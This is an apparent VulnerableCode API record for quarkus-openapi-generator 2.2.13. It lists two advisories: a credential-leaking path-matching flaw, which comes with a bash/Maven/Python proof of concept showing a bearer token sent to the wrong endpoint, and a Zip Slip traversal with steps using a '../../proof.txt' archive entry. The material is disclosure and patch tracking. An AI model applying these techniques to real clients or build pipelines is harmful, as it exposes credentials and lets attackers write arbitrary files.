Package Instance
Look up vulnerable packages by Package URL.
GET /api/packages/1015539?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/1015539?format=api", "purl": "pkg:maven/io.quarkiverse.openapi.generator/quarkus-openapi-generator@2.2.13", "type": "maven", "namespace": "io.quarkiverse.openapi.generator", "name": "quarkus-openapi-generator", "version": "2.2.13", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": "2.16.0-lts", "latest_non_vulnerable_version": "2.17.0", "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/95383?format=api", "vulnerability_id": "VCID-dtfz-cu9w-h7e3", "summary": "quarkus-openapi-generator has overly broad path-parameter matching that sends authentication headers to unintended operations\n### Summary\n\nThe generated authentication filter matches OpenAPI path templates too broadly when deciding whether to attach credentials. A security scheme configured for one operation can therefore be applied to a different same-method operation whose path only partially resembles the protected template, causing bearer tokens, API keys, or basic credentials to be sent to unintended endpoints.\n\n### Details\n\nThe runtime authentication layer selects credentials by comparing the outgoing request path and method against the set of protected OpenAPI operations. Path-template matching treats `{param}` placeholders as `.*`, which incorrectly allows a single path parameter to consume `/`.\n\nAs a result, a protected path such as `/repos/{ref}` also matches `/repos/foo/bar`, even though `/repos/{owner}/{repo}` is a different operation. When a client invokes the unprotected operation, the authentication filter still concludes that the protected operation matched and attaches its credentials.\n\nThis affects authentication providers that rely on the shared path-matching logic, including bearer, OAuth, API-key, and basic authentication. 
The issue is reachable through normal generated-client usage and does not require modifying generated code.\n\n### PoC\n\n```bash\nmkdir -p /tmp/qoag-poc/src/main/java/org/acme\nmkdir -p /tmp/qoag-poc/src/main/resources\nmkdir -p /tmp/qoag-poc/src/main/openapi\n\ncat > /tmp/qoag-poc/pom.xml <<'EOF'\n<project xmlns=\"http://maven.apache.org/POM/4.0.0\"\n xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n xsi:schemaLocation=\"http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd\">\n <modelVersion>4.0.0</modelVersion>\n <groupId>org.acme</groupId>\n <artifactId>qoag-poc</artifactId>\n <version>1.0.0</version>\n\n <properties>\n <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>\n <maven.compiler.release>17</maven.compiler.release>\n <quarkus.platform.group-id>io.quarkus</quarkus.platform.group-id>\n <quarkus.platform.artifact-id>quarkus-bom</quarkus.platform.artifact-id>\n <quarkus.platform.version>3.34.3</quarkus.platform.version>\n <qoag.version>2.16.0</qoag.version>\n </properties>\n\n <dependencyManagement>\n <dependencies>\n <dependency>\n <groupId>${quarkus.platform.group-id}</groupId>\n <artifactId>${quarkus.platform.artifact-id}</artifactId>\n <version>${quarkus.platform.version}</version>\n <type>pom</type>\n <scope>import</scope>\n </dependency>\n </dependencies>\n </dependencyManagement>\n\n <dependencies>\n <dependency>\n <groupId>io.quarkiverse.openapi.generator</groupId>\n <artifactId>quarkus-openapi-generator</artifactId>\n <version>${qoag.version}</version>\n </dependency>\n <dependency>\n <groupId>io.quarkus</groupId>\n <artifactId>quarkus-rest</artifactId>\n </dependency>\n <dependency>\n <groupId>io.quarkus</groupId>\n <artifactId>quarkus-rest-client-jackson</artifactId>\n </dependency>\n </dependencies>\n\n <build>\n <plugins>\n <plugin>\n <groupId>io.quarkus</groupId>\n <artifactId>quarkus-maven-plugin</artifactId>\n <version>${quarkus.platform.version}</version>\n <extensions>true</extensions>\n 
<executions>\n <execution>\n <goals>\n <goal>build</goal>\n <goal>generate-code</goal>\n <goal>generate-code-tests</goal>\n </goals>\n </execution>\n </executions>\n </plugin>\n <plugin>\n <artifactId>maven-compiler-plugin</artifactId>\n <version>3.14.0</version>\n <configuration>\n <parameters>true</parameters>\n </configuration>\n </plugin>\n </plugins>\n </build>\n</project>\nEOF\n\ncat > /tmp/qoag-poc/src/main/openapi/repro.yaml <<'EOF'\nopenapi: 3.0.3\ninfo:\n title: repro\n version: 1.0.0\n\npaths:\n /repos/{ref}:\n get:\n operationId: getRef\n parameters:\n - in: path\n name: ref\n required: true\n schema:\n type: string\n security:\n - bearerAuth: []\n responses:\n \"200\":\n description: ok\n content:\n text/plain:\n schema:\n type: string\n\n /repos/{owner}/{repo}:\n get:\n operationId: getOwnerRepo\n parameters:\n - in: path\n name: owner\n required: true\n schema:\n type: string\n - in: path\n name: repo\n required: true\n schema:\n type: string\n responses:\n \"200\":\n description: ok\n content:\n text/plain:\n schema:\n type: string\n\ncomponents:\n securitySchemes:\n bearerAuth:\n type: http\n scheme: bearer\nEOF\n\ncat > /tmp/qoag-poc/src/main/resources/application.properties <<'EOF'\nquarkus.http.port=8081\nquarkus.openapi-generator.codegen.default-security-scheme=bearerAuth\nquarkus.openapi-generator.codegen.spec.repro_yaml.base-package=org.acme.repro\nquarkus.rest-client.repro_yaml.url=http://127.0.0.1:18080\nquarkus.openapi-generator.repro_yaml.auth.bearerAuth.bearer-token=SECRET\nEOF\n\ncat > /tmp/qoag-poc/src/main/java/org/acme/TriggerResource.java <<'EOF'\npackage org.acme;\n\nimport jakarta.ws.rs.GET;\nimport jakarta.ws.rs.Path;\nimport jakarta.ws.rs.Produces;\nimport jakarta.ws.rs.core.MediaType;\nimport org.eclipse.microprofile.rest.client.inject.RestClient;\n\n@Path(\"/trigger\")\npublic class TriggerResource {\n @RestClient\n org.acme.repro.api.DefaultApi api;\n\n @GET\n @Produces(MediaType.TEXT_PLAIN)\n public String trigger() {\n 
api.getOwnerRepo(\"foo\", \"bar\");\n return \"done\";\n }\n}\nEOF\n\npython - <<'PY' &\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nclass H(BaseHTTPRequestHandler):\n def do_GET(self):\n print(\"PATH=\" + self.path, flush=True)\n print(\"AUTH=\" + str(self.headers.get(\"Authorization\")), flush=True)\n self.send_response(200)\n self.end_headers()\n self.wfile.write(b\"ok\")\n def log_message(self, fmt, *args):\n pass\nHTTPServer((\"127.0.0.1\", 18080), H).serve_forever()\nPY\n\ncd /tmp/qoag-poc\nmvn -q package -DskipTests\njava -jar target/quarkus-app/quarkus-run.jar &\nsleep 8\ncurl -s http://127.0.0.1:8081/trigger\n\n# PATH=/repos/foo/bar\n# AUTH=Bearer SECRET\n```\n\n### Impact\n\nClients generated from an OpenAPI specification can send authentication credentials to endpoints that were not intended to receive them. In practice, this can disclose bearer tokens, API keys, or basic credentials to lower-trust routes on the same service, cause public operations to be invoked with privileged credentials, and blur the intended security boundary between protected and unprotected operations.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42333", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00218", "scoring_system": "epss", "scoring_elements": "0.44506", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00218", "scoring_system": "epss", "scoring_elements": "0.44483", "published_at": "2026-06-09T12:55:00Z" }, { "value": "0.00218", "scoring_system": "epss", "scoring_elements": "0.44471", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00218", "scoring_system": "epss", "scoring_elements": "0.44527", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00218", "scoring_system": "epss", "scoring_elements": "0.44519", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42333" }, { "reference_url": 
"https://github.com/quarkiverse/quarkus-openapi-generator", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/quarkiverse/quarkus-openapi-generator" }, { "reference_url": "https://github.com/quarkiverse/quarkus-openapi-generator/pull/1586", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-11T14:58:43Z/" } ], "url": "https://github.com/quarkiverse/quarkus-openapi-generator/pull/1586" }, { "reference_url": "https://github.com/quarkiverse/quarkus-openapi-generator/releases/tag/2.11.1-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-11T14:58:43Z/" } ], "url": "https://github.com/quarkiverse/quarkus-openapi-generator/releases/tag/2.11.1-lts" }, { "reference_url": "https://github.com/quarkiverse/quarkus-openapi-generator/releases/tag/2.16.0-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": 
"ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-11T14:58:43Z/" } ], "url": "https://github.com/quarkiverse/quarkus-openapi-generator/releases/tag/2.16.0-lts" }, { "reference_url": "https://github.com/quarkiverse/quarkus-openapi-generator/releases/tag/2.17.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-11T14:58:43Z/" } ], "url": "https://github.com/quarkiverse/quarkus-openapi-generator/releases/tag/2.17.0" }, { "reference_url": "https://github.com/quarkiverse/quarkus-openapi-generator/security/advisories/GHSA-fr8f-rwjx-f32v", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-11T14:58:43Z/" } ], "url": "https://github.com/quarkiverse/quarkus-openapi-generator/security/advisories/GHSA-fr8f-rwjx-f32v" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42333", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42333" }, { "reference_url": "https://github.com/advisories/GHSA-fr8f-rwjx-f32v", "reference_id": 
"GHSA-fr8f-rwjx-f32v", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-fr8f-rwjx-f32v" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/119447?format=api", "purl": "pkg:maven/io.quarkiverse.openapi.generator/quarkus-openapi-generator@2.16.0-lts", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:maven/io.quarkiverse.openapi.generator/quarkus-openapi-generator@2.16.0-lts" }, { "url": "http://public2.vulnerablecode.io/api/packages/119449?format=api", "purl": "pkg:maven/io.quarkiverse.openapi.generator/quarkus-openapi-generator@2.17.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:maven/io.quarkiverse.openapi.generator/quarkus-openapi-generator@2.17.0" } ], "aliases": [ "CVE-2026-42333", "GHSA-fr8f-rwjx-f32v" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-dtfz-cu9w-h7e3" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90297?format=api", "vulnerability_id": "VCID-nxrd-h3dz-w7fm", "summary": "quarkus-openapi-generator extension has Zip Slip Path Traversal in ApicurioCodegenWrapper class\n### Summary\nA path traversal vulnerability was discovered in the quarkus-openapi-generator extension\n\n### Details\nThe `unzip()` method in `ApicurioCodegenWrapper.java` extracts ZIP entries without validating that the resolved file path stays within the intended output directory. At line 101, the destination is constructed as `new File(toOutputDir, entry.getName())` and the content is written immediately. 
A malicious ZIP archive containing entries with path traversal sequences (e.g., `../../malicious.java`) would write files outside the target directory.\n\nNotably, the client module in the same repository already contains the correct check. `OpenApiGeneratorStreamCodeGen.java` at line 137 performs proper `normalize()` and `startsWith()` validation. The server module was simply missed.\n\n### PoC\nThis vulnerability is exploitable when an attacker controls or can intercept the ZIP archive served by the Apicurio registry. In environments where the registry connection is over an untrusted network or where TLS is not properly configured, exploitation becomes practical. The attack occurs at build/codegen time.\n\n1. Create a ZIP file containing an entry named `../../proof.txt` with arbitrary content\n2. Configure quarkus-openapi-generator to use the server (Apicurio) code generation path\n3. Serve the malicious ZIP from a controlled or MITM'd Apicurio registry endpoint\n4. Trigger code generation\n5. Observe that `proof.txt` is written two directories above the intended output\n\n### Impact\nAn attacker who can serve a crafted ZIP to the code generation pipeline could write arbitrary files on the build machine. This could overwrite source files, inject malicious code into the build output, or modify configuration files. 
In CI/CD environments, this could lead to supply chain compromise.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-40180", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00096", "scoring_system": "epss", "scoring_elements": "0.26561", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00096", "scoring_system": "epss", "scoring_elements": "0.26468", "published_at": "2026-06-09T12:55:00Z" }, { "value": "0.00096", "scoring_system": "epss", "scoring_elements": "0.26463", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00096", "scoring_system": "epss", "scoring_elements": "0.26519", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00096", "scoring_system": "epss", "scoring_elements": "0.26571", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-40180" }, { "reference_url": "https://github.com/quarkiverse/quarkus-openapi-generator", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/quarkiverse/quarkus-openapi-generator" }, { "reference_url": "https://github.com/quarkiverse/quarkus-openapi-generator/commit/08b406414ff30ed192e86c7fa924e57565534ff0", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-13T20:53:43Z/" } ], "url": 
"https://github.com/quarkiverse/quarkus-openapi-generator/commit/08b406414ff30ed192e86c7fa924e57565534ff0" }, { "reference_url": "https://github.com/quarkiverse/quarkus-openapi-generator/commit/e2a9c629a3df719abc74569a3795c265fd0e1239", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-13T20:53:43Z/" } ], "url": "https://github.com/quarkiverse/quarkus-openapi-generator/commit/e2a9c629a3df719abc74569a3795c265fd0e1239" }, { "reference_url": "https://github.com/quarkiverse/quarkus-openapi-generator/security/advisories/GHSA-jx2w-vp7f-456q", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-13T20:53:43Z/" } ], "url": "https://github.com/quarkiverse/quarkus-openapi-generator/security/advisories/GHSA-jx2w-vp7f-456q" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40180", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": 
"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40180" }, { "reference_url": "https://github.com/advisories/GHSA-jx2w-vp7f-456q", "reference_id": "GHSA-jx2w-vp7f-456q", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-jx2w-vp7f-456q" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/111614?format=api", "purl": "pkg:maven/io.quarkiverse.openapi.generator/quarkus-openapi-generator@2.16.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-dtfz-cu9w-h7e3" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:maven/io.quarkiverse.openapi.generator/quarkus-openapi-generator@2.16.0" } ], "aliases": [ "CVE-2026-40180", "GHSA-jx2w-vp7f-456q" ], "risk_score": 3.5, "exploitability": "0.5", "weighted_severity": "6.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-nxrd-h3dz-w7fm" } ], "fixing_vulnerabilities": [], "risk_score": "3.5", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:maven/io.quarkiverse.openapi.generator/quarkus-openapi-generator@2.2.13" }